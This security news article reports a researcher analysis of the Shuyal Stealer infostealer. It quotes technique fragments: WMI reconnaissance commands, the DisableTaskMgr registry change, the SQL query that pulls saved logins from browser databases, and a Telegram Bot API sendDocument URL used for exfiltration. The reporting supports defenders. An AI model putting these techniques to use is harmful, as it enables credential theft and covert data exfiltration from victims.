New Shuyal Stealer Malware Targets 19 Browsers, Disables Windows Task Manager for Stealth

Security researchers at Point Wild have uncovered a new information-stealing malware dubbed Shuyal Stealer, which pushes the boundaries of traditional credential-harvesting trojans. Unlike most infostealers that focus on a handful of browsers such as Chrome or Edge, Shuyal widens its scope dramatically—targeting 19 different browsers while performing deep reconnaissance of infected systems.

According to the analysis, “Shuyal Stealer is a recently uncovered Infostealer that pushes the boundaries of traditional browser-targeted malware. Unlike most variants that zero in on popular platforms like Chrome and Edge, Shuyal dramatically widens its scope by targeting 19 different browsers, making it far more versatile and dangerous in its data-harvesting capabilities.”

The malware doesn’t just exfiltrate saved credentials. It also collects detailed hardware and configuration data, making it capable of building a unique fingerprint for every compromised system.

As the report details, “Shuyal Stealer conducts deep system profiling using Windows Management Instrumentation (WMI) commands, enabling it to extract granular hardware and configuration data.”

These reconnaissance commands—like wmic diskdrive get model, serial number and wmic path Win32_Keyboard get Description, DeviceID—allow Shuyal to identify components such as disk models, keyboards, and display setups. This data enables attackers to customize exploitation tactics and enhance identity theft precision, particularly in targeted attacks.

One of Shuyal’s most alarming features is its ability to neutralize the Windows Task Manager. Immediately upon execution, the malware scans for the taskmgr.exe process and terminates it, effectively blinding users to its presence.

“As soon as it executes, the malware scans active processes to identify taskmgr.exe and shut down suspicious activity. Once located, Shuyal forcefully terminates it using the TerminateProcess method.”

To ensure persistence, Shuyal then disables the Task Manager entirely by setting the Windows registry value DisableTaskMgr to 1. This not only prevents users from reopening Task Manager but also ensures that the modification persists after reboot, allowing the malware to operate undetected indefinitely.

Shuyal Stealer ensures long-term access by copying itself into the Windows Startup folder using the CopyFileA API, guaranteeing that it launches automatically on reboot.

The analysis highlights, “To ensure it launches automatically with every reboot, the malware uses the CopyFileA API to silently replicate itself into the Windows Startup folder. This guarantees execution upon system restart, allowing Shuyal to remain active without raising alarms.”

This persistence technique, combined with its registry edits, makes remediation significantly more complex for victims—especially those without advanced antivirus tools.

Shuyal’s credential theft engine is engineered for breadth. It searches for the “Login Data” SQLite database across 19 different browsers, including Chrome, Edge, Brave, Opera, Yandex, Tor, Vivaldi, Waterfox, and even less common platforms such as Coc Coc and Maxthon.

Point Wild notes, “By extracting login credentials from such a diverse set of browsers, Shuyal significantly increases its chances of compromising user accounts across different platforms and regions.”

The malware executes the SQL query:

SELECT origin_url, username_value, password_value FROM logins;

This command extracts URLs, usernames, and encrypted passwords directly from browser databases, enabling attackers to reconstruct full login profiles.

But Shuyal’s espionage doesn’t stop there—it also retrieves clipboard content, captures screenshots, and steals Discord authentication tokens. Using Windows APIs such as OpenClipboard, BitBlt, and GdipSaveImageToFile, the malware saves clipboard data to clipboard.txt and screenshots to ss.png before compressing them for exfiltration.

“The program captures a screenshot by utilizing the GdiplusStartup, BitBlt, and GdipSaveImageToFile APIs, and stores the image as ‘ss.png’. It also retrieves authentication tokens from Discord, Discord Canary, and Discord PTB installations.”

Rather than relying on traditional C2 servers, Shuyal leverages Telegram’s Bot API for exfiltration—an increasingly common tactic among modern infostealers for stealth and reliability.

The researchers explain, “In Shuyal stealer’s operation, once it collects sensitive data—credentials, system info, screenshots, and clipboard contents—it compresses the stolen files (often into a ZIP archive) and exfiltrates them using a Telegram bot.”

The Telegram bot token and chat ID are hardcoded into the malware. Using a command like:

https://api.telegram.org/bot<token>/sendDocument?chat_id=<channel>

the malware sends a compressed archive (runtime.zip) to the attacker’s private Telegram channel, ensuring encrypted and instant delivery.

After the exfiltration completes, Shuyal executes a batch file (util.bat) to self-delete, erasing forensic traces and removing evidence of compromise.

“Finally, SHUYAL erases its footprint by generating and executing a batch file designed to remove the malware and its related components. This self-deletion tactic minimizes forensic evidence, making post-infection analysis and attribution significantly more difficult.”

Related Posts:

• SHUYAL: New Stealthy Infostealer Plunders Browser Credentials, System Data, & Screenshots to Telegram
• Following Russian, Iran also issued a signal to ban Telegram
• JavaScript-Based Malware Exploits Steganography for Covert Data Theft
• Ivanti Patches Two High-Severity RCE Flaws in Endpoint Manager
• North Korean Cyberattacks Persist: Developers Targeted via npm